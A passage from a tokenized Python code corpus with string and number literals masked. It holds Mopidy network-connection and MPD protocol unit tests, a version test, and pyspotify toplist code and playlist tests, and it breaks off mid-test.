recv_id = sentinel . tag <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . enable_recv ( self . mock ) <EOL> self . assertEqual ( sentinel . tag , self . mock . recv_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_disable_recv_deregisters ( self ) : <EOL> self . mock . recv_id = sentinel . tag <EOL> network . Connection . disable_recv ( self . mock ) <EOL> GObject . source_remove . assert_called_once_with ( sentinel . tag ) <EOL> self . assertEqual ( None , self . mock . recv_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_disable_recv_already_deregistered ( self ) : <EOL> self . mock . recv_id = None <EOL> network . Connection . disable_recv ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . source_remove . call_count ) <EOL> self . assertEqual ( None , self . mock . recv_id ) <EOL> def test_enable_recv_on_closed_socket ( self ) : <EOL> self . mock . recv_id = None <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . fileno . side_effect = socket . error ( errno . EBADF , '<STR_LIT>' ) <EOL> network . Connection . enable_recv ( self . mock ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> self . assertEqual ( None , self . mock . recv_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_send_registers_with_gobject ( self ) : <EOL> self . mock . send_id = None <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . fileno . return_value = sentinel . fileno <EOL> GObject . io_add_watch . return_value = sentinel . tag <EOL> network . Connection . enable_send ( self . mock ) <EOL> GObject . io_add_watch . assert_called_once_with ( <EOL> sentinel . fileno , <EOL> GObject . IO_OUT | GObject . IO_ERR | GObject . IO_HUP , <EOL> self . mock . send_callback ) <EOL> self . assertEqual ( sentinel . tag , self . 
mock . send_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_send_already_registered ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . send_id = sentinel . tag <EOL> network . Connection . enable_send ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . io_add_watch . call_count ) <EOL> def test_enable_send_does_not_change_tag ( self ) : <EOL> self . mock . send_id = sentinel . tag <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> network . Connection . enable_send ( self . mock ) <EOL> self . assertEqual ( sentinel . tag , self . mock . send_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_disable_send_deregisters ( self ) : <EOL> self . mock . send_id = sentinel . tag <EOL> network . Connection . disable_send ( self . mock ) <EOL> GObject . source_remove . assert_called_once_with ( sentinel . tag ) <EOL> self . assertEqual ( None , self . mock . send_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_disable_send_already_deregistered ( self ) : <EOL> self . mock . send_id = None <EOL> network . Connection . disable_send ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . source_remove . call_count ) <EOL> self . assertEqual ( None , self . mock . send_id ) <EOL> def test_enable_send_on_closed_socket ( self ) : <EOL> self . mock . send_id = None <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . fileno . side_effect = socket . error ( errno . EBADF , '<STR_LIT>' ) <EOL> network . Connection . enable_send ( self . mock ) <EOL> self . assertEqual ( None , self . mock . send_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_timeout_clears_existing_timeouts ( self ) : <EOL> self . mock . timeout = <NUM_LIT:10> <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . 
mock . disable_timeout . assert_called_once_with ( ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_timeout_add_gobject_timeout ( self ) : <EOL> self . mock . timeout = <NUM_LIT:10> <EOL> GObject . timeout_add_seconds . return_value = sentinel . tag <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> GObject . timeout_add_seconds . assert_called_once_with ( <EOL> <NUM_LIT:10> , self . mock . timeout_callback ) <EOL> self . assertEqual ( sentinel . tag , self . mock . timeout_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_enable_timeout_does_not_add_timeout ( self ) : <EOL> self . mock . timeout = <NUM_LIT:0> <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . timeout_add_seconds . call_count ) <EOL> self . mock . timeout = - <NUM_LIT:1> <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . timeout_add_seconds . call_count ) <EOL> self . mock . timeout = None <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . timeout_add_seconds . call_count ) <EOL> def test_enable_timeout_does_not_call_disable_for_invalid_timeout ( self ) : <EOL> self . mock . timeout = <NUM_LIT:0> <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . disable_timeout . call_count ) <EOL> self . mock . timeout = - <NUM_LIT:1> <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . disable_timeout . call_count ) <EOL> self . mock . timeout = None <EOL> network . Connection . enable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . disable_timeout . call_count ) <EOL> @ patch . 
object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_disable_timeout_deregisters ( self ) : <EOL> self . mock . timeout_id = sentinel . tag <EOL> network . Connection . disable_timeout ( self . mock ) <EOL> GObject . source_remove . assert_called_once_with ( sentinel . tag ) <EOL> self . assertEqual ( None , self . mock . timeout_id ) <EOL> @ patch . object ( GObject , '<STR_LIT>' , new = Mock ( ) ) <EOL> def test_disable_timeout_already_deregistered ( self ) : <EOL> self . mock . timeout_id = None <EOL> network . Connection . disable_timeout ( self . mock ) <EOL> self . assertEqual ( <NUM_LIT:0> , GObject . source_remove . call_count ) <EOL> self . assertEqual ( None , self . mock . timeout_id ) <EOL> def test_queue_send_acquires_and_releases_lock ( self ) : <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> network . Connection . queue_send ( self . mock , '<STR_LIT:data>' ) <EOL> self . mock . send_lock . acquire . assert_called_once_with ( True ) <EOL> self . mock . send_lock . release . assert_called_once_with ( ) <EOL> def test_queue_send_calls_send ( self ) : <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send . return_value = '<STR_LIT>' <EOL> network . Connection . queue_send ( self . mock , '<STR_LIT:data>' ) <EOL> self . mock . send . assert_called_once_with ( '<STR_LIT:data>' ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . enable_send . call_count ) <EOL> self . assertEqual ( '<STR_LIT>' , self . mock . send_buffer ) <EOL> def test_queue_send_calls_enable_send_for_partial_send ( self ) : <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send . return_value = '<STR_LIT>' <EOL> network . Connection . queue_send ( self . mock , '<STR_LIT:data>' ) <EOL> self . mock . send . assert_called_once_with ( '<STR_LIT:data>' ) <EOL> self . mock . enable_send . 
assert_called_once_with ( ) <EOL> self . assertEqual ( '<STR_LIT>' , self . mock . send_buffer ) <EOL> def test_queue_send_calls_send_with_existing_buffer ( self ) : <EOL> self . mock . send_buffer = '<STR_LIT:foo>' <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send . return_value = '<STR_LIT>' <EOL> network . Connection . queue_send ( self . mock , '<STR_LIT:bar>' ) <EOL> self . mock . send . assert_called_once_with ( '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . enable_send . call_count ) <EOL> self . assertEqual ( '<STR_LIT>' , self . mock . send_buffer ) <EOL> def test_recv_callback_respects_io_err ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN | GObject . IO_ERR ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_recv_callback_respects_io_hup ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN | GObject . IO_HUP ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_recv_callback_respects_io_hup_and_io_err ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , <EOL> GObject . IO_IN | GObject . IO_HUP | GObject . IO_ERR ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_recv_callback_sends_data_to_actor ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . recv . return_value = '<STR_LIT:data>' <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . 
assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . mock . actor_ref . tell . assert_called_once_with ( <EOL> { '<STR_LIT>' : '<STR_LIT:data>' } ) <EOL> def test_recv_callback_handles_dead_actors ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . recv . return_value = '<STR_LIT:data>' <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . actor_ref . tell . side_effect = pykka . ActorDeadError ( ) <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_recv_callback_gets_no_data ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . recv . return_value = '<STR_LIT>' <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . assertEqual ( self . mock . mock_calls , [ <EOL> call . sock . recv ( any_int ) , <EOL> call . disable_recv ( ) , <EOL> call . actor_ref . tell ( { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> def test_recv_callback_recoverable_error ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> for error in ( errno . EWOULDBLOCK , errno . EINTR ) : <EOL> self . mock . sock . recv . side_effect = socket . error ( error , '<STR_LIT>' ) <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . stop . call_count ) <EOL> def test_recv_callback_unrecoverable_error ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . recv . side_effect = socket . error <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . 
fd , GObject . IO_IN ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_send_callback_respects_io_err ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . return_value = <NUM_LIT:1> <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN | GObject . IO_ERR ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_send_callback_respects_io_hup ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . return_value = <NUM_LIT:1> <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN | GObject . IO_HUP ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_send_callback_respects_io_hup_and_io_err ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . return_value = <NUM_LIT:1> <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , <EOL> GObject . IO_IN | GObject . IO_HUP | GObject . IO_ERR ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_send_callback_acquires_and_releases_lock ( self ) : <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send_lock . acquire . return_value = True <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . 
return_value = <NUM_LIT:0> <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . mock . send_lock . acquire . assert_called_once_with ( False ) <EOL> self . mock . send_lock . release . assert_called_once_with ( ) <EOL> def test_send_callback_fails_to_acquire_lock ( self ) : <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send_lock . acquire . return_value = False <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . return_value = <NUM_LIT:0> <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . mock . send_lock . acquire . assert_called_once_with ( False ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . sock . send . call_count ) <EOL> def test_send_callback_sends_all_data ( self ) : <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send_lock . acquire . return_value = True <EOL> self . mock . send_buffer = '<STR_LIT:data>' <EOL> self . mock . send . return_value = '<STR_LIT>' <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . mock . disable_send . assert_called_once_with ( ) <EOL> self . mock . send . assert_called_once_with ( '<STR_LIT:data>' ) <EOL> self . assertEqual ( '<STR_LIT>' , self . mock . send_buffer ) <EOL> def test_send_callback_sends_partial_data ( self ) : <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send_lock . acquire . return_value = True <EOL> self . mock . send_buffer = '<STR_LIT:data>' <EOL> self . mock . send . return_value = '<STR_LIT>' <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . mock . send . assert_called_once_with ( '<STR_LIT:data>' ) <EOL> self . 
assertEqual ( '<STR_LIT>' , self . mock . send_buffer ) <EOL> def test_send_recoverable_error ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> for error in ( errno . EWOULDBLOCK , errno . EINTR ) : <EOL> self . mock . sock . send . side_effect = socket . error ( error , '<STR_LIT>' ) <EOL> network . Connection . send ( self . mock , '<STR_LIT:data>' ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . stop . call_count ) <EOL> def test_send_calls_socket_send ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . return_value = <NUM_LIT:4> <EOL> self . assertEqual ( '<STR_LIT>' , network . Connection . send ( self . mock , '<STR_LIT:data>' ) ) <EOL> self . mock . sock . send . assert_called_once_with ( '<STR_LIT:data>' ) <EOL> def test_send_calls_socket_send_partial_send ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . return_value = <NUM_LIT:2> <EOL> self . assertEqual ( '<STR_LIT>' , network . Connection . send ( self . mock , '<STR_LIT:data>' ) ) <EOL> self . mock . sock . send . assert_called_once_with ( '<STR_LIT:data>' ) <EOL> def test_send_unrecoverable_error ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . side_effect = socket . error <EOL> self . assertEqual ( '<STR_LIT>' , network . Connection . send ( self . mock , '<STR_LIT:data>' ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_timeout_callback ( self ) : <EOL> self . mock . timeout = <NUM_LIT:10> <EOL> self . assertFalse ( network . Connection . timeout_callback ( self . mock ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from tests . mpd import protocol <EOL> class ChannelsHandlerTest ( protocol . BaseTestCase ) : <EOL> def test_subscribe ( self ) : <EOL> self . send_request ( '<STR_LIT>' ) <EOL> self . assertEqualResponse ( '<STR_LIT>' ) <EOL> def test_unsubscribe ( self ) : <EOL> self . send_request ( '<STR_LIT>' ) <EOL> self . assertEqualResponse ( '<STR_LIT>' ) <EOL> def test_channels ( self ) : <EOL> self . send_request ( '<STR_LIT>' ) <EOL> self . assertEqualResponse ( '<STR_LIT>' ) <EOL> def test_readmessages ( self ) : <EOL> self . send_request ( '<STR_LIT>' ) <EOL> self . assertEqualResponse ( '<STR_LIT>' ) <EOL> def test_sendmessage ( self ) : <EOL> self . send_request ( '<STR_LIT>' ) <EOL> self . assertEqualResponse ( '<STR_LIT>' ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import unittest <EOL> from distutils . version import StrictVersion <EOL> from mopidy import __version__ <EOL> class VersionTest ( unittest . TestCase ) : <EOL> def test_current_version_is_parsable_as_a_strict_version_number ( self ) : <EOL> StrictVersion ( __version__ ) </s>
<s> from __future__ import unicode_literals <EOL> import logging <EOL> import threading <EOL> import spotify <EOL> from spotify import ffi , lib , serialized , utils <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> logger = logging . getLogger ( __name__ ) <EOL> class Toplist ( object ) : <EOL> """<STR_LIT>""" <EOL> type = None <EOL> """<STR_LIT>""" <EOL> region = None <EOL> """<STR_LIT>""" <EOL> canonical_username = None <EOL> """<STR_LIT>""" <EOL> loaded_event = None <EOL> """<STR_LIT>""" <EOL> def __init__ ( <EOL> self , session , type = None , region = None , canonical_username = None , <EOL> callback = None , sp_toplistbrowse = None , add_ref = True ) : <EOL> assert ( type is not None and region is not None ) or sp_toplistbrowse , '<STR_LIT>' <EOL> self . _session = session <EOL> self . type = type <EOL> self . region = region <EOL> self . canonical_username = canonical_username <EOL> self . loaded_event = threading . Event ( ) <EOL> if sp_toplistbrowse is None : <EOL> if isinstance ( region , ToplistRegion ) : <EOL> region = int ( region ) <EOL> else : <EOL> region = utils . to_country_code ( region ) <EOL> handle = ffi . new_handle ( ( self . _session , self , callback ) ) <EOL> self . _session . _callback_handles . add ( handle ) <EOL> sp_toplistbrowse = lib . sp_toplistbrowse_create ( <EOL> self . _session . _sp_session , int ( type ) , region , <EOL> utils . to_char_or_null ( canonical_username ) , <EOL> _toplistbrowse_complete_callback , handle ) <EOL> add_ref = False <EOL> if add_ref : <EOL> lib . sp_toplistbrowse_add_ref ( sp_toplistbrowse ) <EOL> self . _sp_toplistbrowse = ffi . gc ( <EOL> sp_toplistbrowse , lib . sp_toplistbrowse_release ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . type , self . region , self . canonical_username ) <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , self . __class__ ) : <EOL> return self . _sp_toplistbrowse == other . 
_sp_toplistbrowse <EOL> else : <EOL> return False <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . _sp_toplistbrowse ) <EOL> @ property <EOL> def is_loaded ( self ) : <EOL> """<STR_LIT>""" <EOL> return bool ( lib . sp_toplistbrowse_is_loaded ( self . _sp_toplistbrowse ) ) <EOL> def load ( self , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> return utils . load ( self . _session , self , timeout = timeout ) <EOL> @ property <EOL> def error ( self ) : <EOL> """<STR_LIT>""" <EOL> return spotify . ErrorType ( <EOL> lib . sp_toplistbrowse_error ( self . _sp_toplistbrowse ) ) <EOL> @ property <EOL> def backend_request_duration ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_loaded : <EOL> return None <EOL> return lib . sp_toplistbrowse_backend_request_duration ( <EOL> self . _sp_toplistbrowse ) <EOL> @ property <EOL> @ serialized <EOL> def tracks ( self ) : <EOL> """<STR_LIT>""" <EOL> spotify . Error . maybe_raise ( self . error ) <EOL> if not self . is_loaded : <EOL> return [ ] <EOL> @ serialized <EOL> def get_track ( sp_toplistbrowse , key ) : <EOL> return spotify . Track ( <EOL> self . _session , <EOL> sp_track = lib . sp_toplistbrowse_track ( sp_toplistbrowse , key ) , <EOL> add_ref = True ) <EOL> return utils . Sequence ( <EOL> sp_obj = self . _sp_toplistbrowse , <EOL> add_ref_func = lib . sp_toplistbrowse_add_ref , <EOL> release_func = lib . sp_toplistbrowse_release , <EOL> len_func = lib . sp_toplistbrowse_num_tracks , <EOL> getitem_func = get_track ) <EOL> @ property <EOL> @ serialized <EOL> def albums ( self ) : <EOL> """<STR_LIT>""" <EOL> spotify . Error . maybe_raise ( self . error ) <EOL> if not self . is_loaded : <EOL> return [ ] <EOL> @ serialized <EOL> def get_album ( sp_toplistbrowse , key ) : <EOL> return spotify . Album ( <EOL> self . _session , <EOL> sp_album = lib . 
sp_toplistbrowse_album ( sp_toplistbrowse , key ) , <EOL> add_ref = True ) <EOL> return utils . Sequence ( <EOL> sp_obj = self . _sp_toplistbrowse , <EOL> add_ref_func = lib . sp_toplistbrowse_add_ref , <EOL> release_func = lib . sp_toplistbrowse_release , <EOL> len_func = lib . sp_toplistbrowse_num_albums , <EOL> getitem_func = get_album ) <EOL> @ property <EOL> @ serialized <EOL> def artists ( self ) : <EOL> """<STR_LIT>""" <EOL> spotify . Error . maybe_raise ( self . error ) <EOL> if not self . is_loaded : <EOL> return [ ] <EOL> @ serialized <EOL> def get_artist ( sp_toplistbrowse , key ) : <EOL> return spotify . Artist ( <EOL> self . _session , <EOL> sp_artist = lib . sp_toplistbrowse_artist ( sp_toplistbrowse , key ) , <EOL> add_ref = True ) <EOL> return utils . Sequence ( <EOL> sp_obj = self . _sp_toplistbrowse , <EOL> add_ref_func = lib . sp_toplistbrowse_add_ref , <EOL> release_func = lib . sp_toplistbrowse_release , <EOL> len_func = lib . sp_toplistbrowse_num_artists , <EOL> getitem_func = get_artist ) <EOL> @ ffi . callback ( '<STR_LIT>' ) <EOL> @ serialized <EOL> def _toplistbrowse_complete_callback ( sp_toplistbrowse , handle ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> if handle == ffi . NULL : <EOL> logger . warning ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return <EOL> ( session , toplist , callback ) = ffi . from_handle ( handle ) <EOL> session . _callback_handles . remove ( handle ) <EOL> toplist . loaded_event . set ( ) <EOL> if callback is not None : <EOL> callback ( toplist ) <EOL> @ utils . make_enum ( '<STR_LIT>' ) <EOL> class ToplistRegion ( utils . IntEnum ) : <EOL> pass <EOL> @ utils . make_enum ( '<STR_LIT>' ) <EOL> class ToplistType ( utils . IntEnum ) : <EOL> pass </s>
<s> from __future__ import unicode_literals <EOL> import unittest <EOL> import spotify <EOL> import tests <EOL> from tests import mock <EOL> @ mock . patch ( '<STR_LIT>' , spec = spotify . lib ) <EOL> class PlaylistUnseenTracksTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . session = tests . create_session_mock ( ) <EOL> @ mock . patch ( '<STR_LIT>' , spec = spotify . lib ) <EOL> def test_normal_usage ( self , track_lib_mock , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> total_num_tracks = <NUM_LIT:3> <EOL> sp_tracks = [ <EOL> spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> + i ) <EOL> for i in range ( total_num_tracks ) ] <EOL> def func ( sp_pc , sp_p , sp_t , num_t ) : <EOL> for i in range ( min ( total_num_tracks , num_t ) ) : <EOL> sp_t [ i ] = sp_tracks [ i ] <EOL> return total_num_tracks <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . side_effect = func <EOL> tracks = spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> lib_mock . sp_playlistcontainer_add_ref . assert_called_with ( <EOL> sp_playlistcontainer ) <EOL> lib_mock . sp_playlist_add_ref . assert_called_with ( sp_playlist ) <EOL> self . assertEqual ( len ( tracks ) , total_num_tracks ) <EOL> self . assertEqual ( <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . call_count , <NUM_LIT:1> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . assert_called_with ( <EOL> sp_playlistcontainer , sp_playlist , mock . ANY , <NUM_LIT:0> ) <EOL> track0 = tracks [ <NUM_LIT:0> ] <EOL> self . assertEqual ( <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . call_count , <NUM_LIT:2> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . assert_called_with ( <EOL> sp_playlistcontainer , sp_playlist , mock . ANY , total_num_tracks ) <EOL> self . assertIsInstance ( track0 , spotify . 
Track ) <EOL> self . assertEqual ( track0 . _sp_track , sp_tracks [ <NUM_LIT:0> ] ) <EOL> track1 = tracks [ <NUM_LIT:1> ] <EOL> self . assertEqual ( <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . call_count , <NUM_LIT:2> ) <EOL> self . assertIsInstance ( track1 , spotify . Track ) <EOL> self . assertEqual ( track1 . _sp_track , sp_tracks [ <NUM_LIT:1> ] ) <EOL> track2 = tracks [ - <NUM_LIT:3> ] <EOL> self . assertEqual ( track2 . _sp_track , track0 . _sp_track ) <EOL> self . assertEqual ( <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . call_count , <NUM_LIT:2> ) <EOL> def test_raises_error_on_failure ( self , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . return_value = - <NUM_LIT:3> <EOL> with self . assertRaises ( spotify . Error ) : <EOL> spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> @ mock . patch ( '<STR_LIT>' , spec = spotify . lib ) <EOL> def test_getitem_with_slice ( self , track_lib_mock , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> total_num_tracks = <NUM_LIT:3> <EOL> sp_tracks = [ <EOL> spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> + i ) <EOL> for i in range ( total_num_tracks ) ] <EOL> def func ( sp_pc , sp_p , sp_t , num_t ) : <EOL> for i in range ( min ( total_num_tracks , num_t ) ) : <EOL> sp_t [ i ] = sp_tracks [ i ] <EOL> return total_num_tracks <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . side_effect = func <EOL> tracks = spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> result = tracks [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> self . assertIsInstance ( result , list ) <EOL> self . 
assertEqual ( len ( result ) , <NUM_LIT:2> ) <EOL> self . assertIsInstance ( result [ <NUM_LIT:0> ] , spotify . Track ) <EOL> self . assertEqual ( result [ <NUM_LIT:0> ] . _sp_track , sp_tracks [ <NUM_LIT:0> ] ) <EOL> self . assertIsInstance ( result [ <NUM_LIT:1> ] , spotify . Track ) <EOL> self . assertEqual ( result [ <NUM_LIT:1> ] . _sp_track , sp_tracks [ <NUM_LIT:1> ] ) <EOL> def test_getitem_raises_index_error_on_too_low_index ( self , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . return_value = <NUM_LIT:0> <EOL> tracks = spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> with self . assertRaises ( IndexError ) as ctx : <EOL> tracks [ - <NUM_LIT:1> ] <EOL> self . assertEqual ( str ( ctx . exception ) , '<STR_LIT>' ) <EOL> def test_getitem_raises_index_error_on_too_high_index ( self , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . return_value = <NUM_LIT:0> <EOL> tracks = spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> with self . assertRaises ( 